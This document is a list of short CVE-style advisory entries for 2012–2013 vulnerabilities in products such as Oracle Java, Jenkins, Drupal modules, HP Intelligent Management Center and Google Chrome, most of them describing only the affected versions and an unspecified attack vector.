Unspecified vulnerability in the APM - Application Performance Management component in Oracle Enterprise Manager Grid Control 6.5, 11.1, and 12.1.0.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Business Transaction Management.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1; EM DB Control 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3; and EM Plugin for DB 12.1.0.1 and 12.1.0.2 allows remote attackers to affect integrity via unknown vectors related to Resource Manager.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, and EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, allows remote attackers to affect integrity via unknown vectors related to Distributed/Cross DB Features.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5, and EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, allows remote attackers to affect integrity via unknown vectors related to Policy Framework.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1; EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3; and EM Plugin for DB 12.1.0.1 allows remote attackers to affect integrity via unknown vectors related to Enterprise Configuration Management.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1; EM DB Control 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3; and EM Plugin for DB 12.1.0.1 and 12.1.0.2 allows remote attackers to affect integrity via unknown vectors related to Content Management.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than other CVEs listed in the February 2013 CPU.
Unspecified vulnerability in Jenkins before 1.502 and LTS before 1.480.3 allows remote authenticated users with write access to build arbitrary jobs via unknown attack vectors.
Unspecified vulnerability in Jenkins before 1.502 and LTS before 1.480.3 allows remote attackers to bypass the CSRF protection mechanism via unknown attack vectors.
Cross-site request forgery (CSRF) vulnerability in Jenkins master in Jenkins before 1.502 and LTS before 1.480.3 allows remote attackers to hijack the authentication of users via unknown vectors.
Unspecified vulnerability in core/ajax/translations.php in ownCloud before 4.0.12 and 4.5.x before 4.5.6 allows remote authenticated users to execute arbitrary PHP code via unknown vectors.  NOTE: this entry has been SPLIT due to different affected versions. The core/settings.php issue is covered by CVE-2013-7344.
Unspecified vulnerability in the Drush Debian Packaging module for Drupal allows local users to obtain database credentials via unknown vectors.
Devise gem 2.2.x before 2.2.3, 2.1.x before 2.1.3, 2.0.x before 2.0.5, and 1.5.x before 1.5.4 for Ruby, when using certain databases, does not properly perform type conversion when performing database queries, which might allow remote attackers to cause incorrect results to be returned and bypass security checks via unknown vectors, as demonstrated by resetting passwords of arbitrary accounts.
Cross-site request forgery (CSRF) vulnerability in the Mark Complete module 7.x-1.x before 7.x-1.1 for Drupal allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in the RESTful Web Services (restws) module 7.x-1.x before 7.x-1.2 and 7.x-2.x before 7.x-2.0-alpha4 for Drupal allows remote attackers to hijack the authentication of arbitrary users via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in ManageIQ Enterprise Virtualization Manager (EVM) allows remote attackers to hijack the authentication of users for requests that have unspecified impact via unknown vectors.
Unspecified vulnerability in Rack::Auth::AbstractRequest in Rack 1.1.x before 1.1.5, 1.2.x before 1.2.7, 1.3.x before 1.3.9, and 1.4.x before 1.4.4 allows remote attackers to cause a denial of service via unknown vectors related to "symbolized arbitrary strings."
Unspecified vulnerability in Jenkins before 1.498, Jenkins LTS before 1.480.2, and Jenkins Enterprise 1.447.x before 1.447.6.1 and 1.466.x before 1.466.12.1, when a slave is attached and anonymous read access is enabled, allows remote attackers to obtain the master cryptographic key via unknown vectors.
Directory traversal vulnerability in index.php in phpMoneyBooks 1.0.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2012-1669. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  NOTE: this issue might have been fixed in 1.0.3.
Cross-site scripting (XSS) vulnerability in ClipBucket 2.6 allows remote attackers to inject arbitrary web script or HTML via the type parameter to view_channel.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site request forgery (CSRF) vulnerabilities in the Newsletter Manager plugin 1.0.2 and earlier for WordPress allow remote attackers to hijack the authentication of administrators for requests that (1) change an email address or (2) conduct script insertion attacks.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in admin/action.php in phpVMS 2.1.x before 2.1.935 has unknown impact and attack vectors.
Unspecified vulnerability in the NinjaXplorer component before 1.0.7 for Joomla! has unknown impact and attack vectors.
Cisco Adaptive Security Appliances (ASA) devices with firmware 8.4 do not properly validate unspecified input related to UNC share pathnames, which allows remote authenticated users to cause a denial of service (device crash) via unknown vectors, aka Bug ID CSCuc65775.
Unspecified vulnerability in CA IdentityMinder r12.0 through CR16, r12.5 before SP15, and r12.6 GA allows remote attackers to bypass intended access restrictions via unknown vectors.
Unspecified vulnerability in CA IdentityMinder r12.0 through CR16, r12.5 before SP15, and r12.6 GA allows remote attackers to execute arbitrary commands or modify data via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in Mahara 1.4.x before 1.4.5 and 1.5.x before 1.5.4, and other versions including 1.2, allow remote attackers to inject arbitrary web script or HTML via a CSV header with "unknown fields," which are not properly handled in error messages in the (1) bulk user, (2) group, and (3) group member upload capabilities.  NOTE: this issue was originally part of CVE-2012-2243, but that ID was SPLIT due to different issues by different researchers.
Unspecified vulnerability in the IBM HTTP Server component 5.3 in IBM WebSphere Application Server (WAS) for z/OS allows remote attackers to execute arbitrary commands via unknown vectors.
Unspecified vulnerability in IBM Tivoli Storage Manager for Space Management (aka TSM HSM) before 6.2.5.0 and 6.3.x before 6.3.1.0 allows remote attackers to read or modify HSM-managed file system objects via unknown vectors.
Unspecified vulnerability in the CLA2 server in IBM Gentran Integration Suite 4.3, Sterling Integrator 5.0 and 5.1, and Sterling B2B Integrator 5.2, as used in IBM Sterling File Gateway 1.1 through 2.2 and other products, allows remote attackers to execute arbitrary commands via unknown vectors.
Multiple unspecified vulnerabilities in iRODS before 3.1 have unknown impact and attack vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 17.0, Thunderbird before 17.0, and SeaMonkey before 2.14 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 17.0, Firefox ESR 10.x before 10.0.11, Thunderbird before 17.0, Thunderbird ESR 10.x before 10.0.11, and SeaMonkey before 2.14 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in the WebAdmin application 6.0.5, 6.0.8, and 7.0 before P2 in IBM Netezza allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
The IBM WebSphere DataPower XC10 Appliance 2.0.0.0 through 2.0.0.3 and 2.1.0.0 through 2.1.0.2 does not require authentication for an unspecified interface, which allows remote attackers to cause a denial of service (process exit) via unknown vectors.
Unspecified vulnerability in admin/sources/base/core.php in Invision Power Board (aka IPB or IP.Board) 3.1.x through 3.3.x has unknown impact and remote attack vectors.
Unspecified vulnerability in Adobe ColdFusion 10 before Update 5, when Internet Information Services (IIS) is used, allows attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 has unknown impact and attack vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in the RESTful Web Services (RESTWS) module 7.x-1.x before 7.x-1.1 and 7.x-2.x before 7.x-2.0-alpha3 for Drupal allow remote attackers to hijack the authentication of arbitrary users via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in the Time Spent module 6.x and 7.x for Drupal allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in Cisco IOS before 15.3(2)T on AS5400 devices allows remote authenticated users to cause a denial of service (spurious errors) via unknown vectors, aka Bug ID CSCub61009.
Directory traversal vulnerability in index.php in phpPaleo 4.8b180 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the phppaleo4_lang cookie, a different vulnerability than CVE-2012-1671.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The IPv6 implementation in Apple Mac OS X (unknown versions, year 2012 and earlier) allows remote attackers to cause a denial of service via a flood of ICMPv6 Router Advertisement packets containing multiple Routing entries.
The IPv6 implementation in FreeBSD and NetBSD (unknown versions, year 2012 and earlier) allows remote attackers to cause a denial of service via a flood of ICMPv6 Router Advertisement packets containing multiple Routing entries.
The IPv6 implementation in FreeBSD and NetBSD (unknown versions, year 2012 and earlier) allows remote attackers to cause a denial of service via a flood of ICMPv6 Neighbor Solicitation messages, a different vulnerability than CVE-2011-2393.
Unspecified vulnerability in the JE Story Submit (com_jesubmit) component before 1.9 for Joomla! has unknown impact and attack vectors.
Directory traversal vulnerability in the PostScript Interpreter, as used on the HP LaserJet 4xxx, 5200, 90xx, M30xx, M4345, M50xx, M90xx, P3005, and P4xxx; LaserJet Enterprise P3015; Color LaserJet 3xxx, 47xx, 5550, 9500, CM60xx, CP35xx, CP4005, and CP6015; Color LaserJet Enterprise CP4xxx; and 9250c Digital Sender with model-dependent firmware through 52.x allows remote attackers to read arbitrary files via unknown vectors.
Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.00, and 7.01 allows local users to gain privileges via unknown vectors.
Cross-site request forgery (CSRF) vulnerability on HP ProCurve 1700-8 (aka J9079A) switches with software before VA.02.09 and 1700-24 (aka J9080A) switches with software before VB.02.09 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability on the HP LaserJet Pro M1212nf, M1213nf, M1214nfh, M1216nfh, M1217nfw, and M1219nf, and HotSpot LaserJet Pro M1218nfs, with firmware before 20130211; LaserJet Pro CP1025nw with firmware before 20130212; and LaserJet Pro P1102w and P1606dn with firmware before 20130213 allows remote attackers to modify data or cause a denial of service via unknown vectors.
Unspecified vulnerability in HP ServiceCenter 6.2.8 before 6.2.8.10 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Intelligent Management Center (iMC) and Intelligent Management Center for Automated Network Manager (ANM) before 5.2 E0401 allows remote attackers to obtain sensitive information via unknown vectors, aka ZDI-CAN-1662.
Unspecified vulnerability in HP Intelligent Management Center (iMC) and Intelligent Management Center for Automated Network Manager (ANM) before 5.2 E0401 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors, aka ZDI-CAN-1663.
Unspecified vulnerability in HP Intelligent Management Center (iMC) User Access Manager (UAM) before 5.2 E0402 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors, aka ZDI-CAN-1643.
Unspecified vulnerability in HP Intelligent Management Center (iMC) TACACS+ Authentication Manager (TAM) before 5.2 E0401 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors, aka ZDI-CAN-1646.
Unspecified vulnerability in HP Intelligent Management Center (iMC) and Intelligent Management Center for Automated Network Manager (ANM) before 5.2 E0401 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1659.
Unspecified vulnerability in HP Intelligent Management Center (iMC) and Intelligent Management Center for Automated Network Manager (ANM) before 5.2 E0401 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors, aka ZDI-CAN-1615.
Unspecified vulnerability in HP Intelligent Management Center (iMC) and Intelligent Management Center for Automated Network Manager (ANM) before 5.2 E0401 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors, aka ZDI-CAN-1661.
Unspecified vulnerability in HP Intelligent Management Center (iMC) and Intelligent Management Center for Automated Network Manager (ANM) before 5.2 E0401 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors, aka ZDI-CAN-1660.
Unspecified vulnerability in HP Intelligent Management Center (iMC) and Intelligent Management Center for Automated Network Manager (ANM) before 5.2 E0401 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors, aka ZDI-CAN-1650.
Unspecified vulnerability in HP Intelligent Management Center (iMC) and Intelligent Management Center for Automated Network Manager (ANM) before 5.2 E0401 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors, aka ZDI-CAN-1614.
Unspecified vulnerability in HP Intelligent Management Center (iMC) and Intelligent Management Center for Automated Network Manager (ANM) before 5.2 E0401 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors, aka ZDI-CAN-1613.
Unspecified vulnerability in HP Intelligent Management Center (iMC) and Intelligent Management Center for Automated Network Manager (ANM) before 5.2 E0401 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors, aka ZDI-CAN-1612.
Unspecified vulnerability in HP Intelligent Management Center (iMC) and Intelligent Management Center for Automated Network Manager (ANM) before 5.2 E0401 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1611.
Unspecified vulnerability in HP ArcSight Connector Appliance 6.3 and earlier and ArcSight Logger 5.2 and earlier allows remote authenticated users to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP ArcSight Connector Appliance before 6.3 and ArcSight Logger 5.2 and earlier allows remote attackers to obtain sensitive information via unknown vectors.
Multiple unspecified vulnerabilities in Condor 7.6.x before 7.6.10 and 7.8.x before 7.8.4 have unknown impact and attack vectors related to "error checking of system calls."
Multiple buffer overflows in Condor 7.6.x before 7.6.10 and 7.8.x before 7.8.4 have unknown impact and attack vectors.
Integer overflow in the audio IPC layer in Google Chrome before 24.0.1312.52 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Google Chrome before 23.0.1271.91 does not properly perform a cast of an unspecified variable during handling of the INPUT element, which allows remote attackers to cause a denial of service or possibly have unknown other impact via a crafted HTML document.
Google Chrome before 23.0.1271.91 on Mac OS X does not properly mitigate improper rendering behavior in the Intel GPU driver, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Heap-based buffer overflow in the WebGL subsystem in Google Chrome OS before 23.0.1271.94 allows remote attackers to cause a denial of service (GPU process crash) or possibly have unspecified other impact via unknown vectors.
Google V8 before 3.13.7.5, as used in Google Chrome before 23.0.1271.64, does not properly perform write operations, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Google Chrome before 23.0.1271.64 does not properly handle textures, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Google Chrome before 23.0.1271.64 does not properly perform a cast of an unspecified variable during handling of input, which allows remote attackers to cause a denial of service or possibly have other impact via unknown vectors.
Google Chrome before 23.0.1271.64 on Mac OS X does not properly validate an integer value during the handling of GPU command buffers, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Google Chrome before 23.0.1271.64 on Mac OS X does not properly mitigate improper write behavior in graphics drivers, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger "wild writes."
Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users with Server Privileges to affect availability via unknown vectors.
Unspecified vulnerability in Oracle Sun Solaris 10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to inetd.
Unspecified vulnerability in the Oracle Agile PLM for Process component in Oracle Supply Chain Products Suite 5.2.2 and 6.1.0.0 allows remote attackers to affect confidentiality via unknown vectors related to User Group Management.
Unspecified vulnerability in the Oracle Agile PLM for Process component in Oracle Supply Chain Products Suite 5.2.2 and 6.1.0.0 allows remote attackers to affect integrity via unknown vectors related to Global Spec Management.
Unspecified vulnerability in the Oracle Agile PLM for Process component in Oracle Supply Chain Products Suite 5.2.2 and 6.1.0.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Supply Chain Relationship Management.
Unspecified vulnerability in the Oracle Agile Product Supplier Collaboration for Process component in Oracle Supply Chain Products Suite 5.2.2 and 6.1.0.0 allows remote attackers to affect confidentiality via unknown vectors related to Supplier Portal.
Unspecified vulnerability in the Oracle Agile PLM for Process component in Oracle Supply Chain Products Suite 5.2.2 and 6.1.0.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Document Reference Library.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Beans.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Beans.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote authenticated users to have an unspecified impact via unknown vectors related to Networking.  NOTE: the Oracle CPU states that this issue has a 0.0 CVSS score. If so, then this is not a vulnerability and this issue should not be included in CVE.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Swing.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, 1.4.2_38 and earlier, and JavaFX 2.2 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2 and earlier allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2012-5078.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect integrity via unknown vectors related to Libraries, a different vulnerability than CVE-2012-5073.
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2012-5080.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect integrity via unknown vectors related to Libraries, a different vulnerability than CVE-2012-5079.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, and 5.0 Update 36 and earlier allows remote attackers to affect confidentiality and integrity via unknown vectors related to Concurrency.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier allows remote attackers to affect confidentiality via unknown vectors related to Deployment.
Unspecified vulnerability in the Oracle Central Designer component in Oracle Industry Applications 1.3, 1.4, and 1.4.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1, 7.6.2, and 11.1.1.6.0 allows local users to affect integrity via unknown vectors related to ImagePicker.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and EM DB Control 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote attackers to affect integrity via unknown vectors related to User Interface Framework.
Unspecified vulnerability in the PeopleSoft PeopleTools component in Oracle PeopleSoft Products 8.51 and 8.52 allows remote attackers to affect integrity via unknown vectors related to Portal, a different vulnerability than CVE-2013-0392.
Unspecified vulnerability in the Oracle iStore component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to the Web interface.
The SPDY protocol 3 and earlier, as used in Mozilla Firefox, Google Chrome, and other products, can perform TLS encryption of compressed data without properly obfuscating the length of the unencrypted data, which allows man-in-the-middle attackers to obtain plaintext HTTP headers by observing length differences during a series of guesses in which a string in an HTTP request potentially matches an unknown string in an HTTP header, aka a "CRIME" attack.
The TLS protocol 1.2 and earlier, as used in Mozilla Firefox, Google Chrome, Qt, and other products, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which allows man-in-the-middle attackers to obtain plaintext HTTP headers by observing length differences during a series of guesses in which a string in an HTTP request potentially matches an unknown string in an HTTP header, aka a "CRIME" attack.
Multiple SQL injection vulnerabilities in approve.php in Img Pals Photo Host 1.0 allow remote attackers to execute arbitrary SQL commands via the u parameter in a (1) app0 or (2) app1 action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in FlatnuX CMS 2012-03.08 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) title_en, (2) summary_en, or (3) body_en parameter in a submitnews action to the news module, a different vulnerability than CVE-2012-4890.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in fw/index2.do in ManageEngine Firewall Analyzer 7.2 allows remote attackers to inject arbitrary web script or HTML via the url parameter, a different vector than CVE-2012-4889.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple untrusted search path vulnerabilities in 3DVIA Composer V6R2012 HF1 Build 6.8.1.1652 allow local users to gain privileges via a Trojan horse (1) dwmapi.dll or (2) ibfs32.dll file in the current working directory, as demonstrated by a directory that contains a .smg file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple untrusted search path vulnerabilities in 3D XML Player 6.212.13.12076 allow local users to gain privileges via a Trojan horse (1) dwmapi.dll or (2) JT0DevPhase.dll file in the current working directory, as demonstrated by a directory that contains a .3dx file. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Untrusted search path vulnerability in moviEZ HD 1.0 Build 2554-29894-A allows local users to gain privileges via a Trojan horse avrt.dll file in the current working directory, as demonstrated by a directory that contains a .mvz file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple untrusted search path vulnerabilities in DVD Architect Pro 5.2 Build 133 and DVD Architect Studio 5.0 Build 156 allow local users to gain privileges via a Trojan horse (1) enc_mp2v.200 or (2) CFHDDecoder.dll file in the current working directory, as demonstrated by a directory that contains a .dar file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Another WordPress Classifieds Plugin before 2.0 for WordPress has unknown impact and attack vectors related to "image uploads."
Unspecified vulnerability in IBM Tivoli Storage Manager for Space Management (aka TSM HSM) before 6.2.5.0 and 6.3.x before 6.3.1.0 allows local users to read or modify file system objects via unknown vectors.
Unspecified vulnerability in the web services framework in IBM WebSphere Commerce 6.0 through 6.0.0.11 and 7.0 through 7.0.0.6 allows remote attackers to cause a denial of service (login outage) via unknown vectors.
Unspecified vulnerability in Tivoli Endpoint Manager for Remote Control Broker 8.2 before 8.2.1-TIV-TEMRC821-IF0002 allows remote attackers to cause a denial of service (resource consumption) via unknown vectors.
Unspecified vulnerability in IBM WebSphere Commerce 6.0 through 6.0.0.11 and 7.0 through 7.0.0.6 allows remote attackers to obtain users' personal data via unknown vectors.
Multiple untrusted search path vulnerabilities in CyberLink PowerProducer 5.5.3.2325 allow local users to gain privileges via a Trojan horse (1) mfc71loc.dll or (2) mfc71enu.dll file in the current working directory, as demonstrated by a directory that contains a .ppp or .rdf file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple untrusted search path vulnerabilities in CyberLink StreamAuthor 4.0 build 3308 allow local users to gain privileges via a Trojan horse (1) mfc71loc.dll or (2) mfc71enu.dll file in the current working directory, as demonstrated by a directory that contains a .sta or .stp file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple untrusted search path vulnerabilities in CyberLink LabelPrint 2.5.3602 allow local users to gain privileges via a Trojan horse (1) mfc71loc.dll or (2) mfc71enu.dll file in the current working directory, as demonstrated by a directory that contains a .lpp file. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site request forgery (CSRF) vulnerabilities in ownCloud before 4.0.5 allow remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Request Tracker (RT) 3.8.x before 3.8.15 and 4.0.x before 4.0.8 allows remote attackers to conduct a "confused deputy" attack to bypass the CSRF warning protection mechanism and cause victims to "modify arbitrary state" via unknown vectors related to a crafted link.
FAQ manager for Request Tracker (RTFM) before 2.4.5 does not properly check user rights, which allows remote authenticated users to create arbitrary articles in arbitrary classes via unknown vectors.
Request Tracker (RT) 3.8.x before 3.8.15 and 4.0.x before 4.0.8 allows remote authenticated users with ModifySelf or AdminUser privileges to inject arbitrary email headers and conduct phishing attacks or obtain sensitive information via unknown vectors.
Moxa EDR-G903 series routers with firmware before 2.11 have a hardcoded account, which allows remote attackers to obtain unspecified device access via unknown vectors.
Unspecified vulnerability in bitcoind and Bitcoin-Qt allows attackers to cause a denial of service via unknown vectors, a different vulnerability than CVE-2012-4682.
Unspecified vulnerability in bitcoind and Bitcoin-Qt allows attackers to cause a denial of service via unknown vectors, a different vulnerability than CVE-2012-4683.
Multiple cross-site request forgery (CSRF) vulnerabilities in LetoDMS (formerly MyDMS) before 3.3.8 allow remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in awredir.pl in AWStats before 7.1 has unknown impact and attack vectors.
Unspecified vulnerability in the Drag &amp; Drop Gallery module 6.x for Drupal allows remote attackers to bypass access restrictions via unknown attack vectors.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality and integrity via unknown vectors related to Hotspot.
Multiple unspecified vulnerabilities in Gallery 3 before 3.0.4 allow attackers to execute arbitrary PHP code via unknown vectors.
Multiple unspecified vulnerabilities in SPIP before 1.9.2.o, 2.0.x before 2.0.18, and 2.1.x before 2.1.13 have unknown impact and attack vectors that are not related to cross-site scripting (XSS), different vulnerabilities than CVE-2012-2151.
Unspecified vulnerability in the MAPI in vBulletin Suite 4.1.2 through 4.1.12, Forum 4.1.2 through 4.1.12, and the MAPI plugin 1.4.3 for vBulletin 3.x has unknown impact and attack vectors.
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.  NOTE: the previous information is from the February 2013 CPU. Oracle has not commented on claims from a third party that the issue allows remote attackers to execute arbitrary code via vectors related to an "invalid type cast" and exposed native methods in the T2KGlyph class.
Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 11.1.1.6.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Content Server.
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.  NOTE: the previous information is from the February 2013 CPU. Oracle has not commented on claims from a third party that this issue allows remote attackers to execute arbitrary code via an "invalid type case" in the init method of the D3DShader class in the com.sun.prism.d3d package. CPU.
Unspecified vulnerability in Hitachi IT Operations Director 02-50-01 through 02-50-07, 03-00 before 03-00-08 allows attackers to cause a denial of service via unknown attack vectors.
Unspecified vulnerability in Hitachi Cobol GUI Option 06-00, 06-01 through 06-01-/A, 07-00, 07-01 before 07-01-/B, and 08-00 before 08-00-/B and Cobol GUI Option Server 07-00, 07-01 before 07-01-/B, and 08-00 before 08-00-/B allows remote attackers to execute arbitrary code via unknown attack vectors.
Unspecified vulnerability in Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x before 12.01 on Mac OS X, has unknown impact and attack vectors, related to a "low severity issue."
Cross-site request forgery (CSRF) vulnerability in eZOE flash player in eZ Publish 4.1 through 4.6 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome OS before 21.0.1180.50 on the Cr-48 and Samsung Series 5 and 5 550 Chromebook platforms, and the Samsung Chromebox Series 3, have unknown impact and attack vectors.
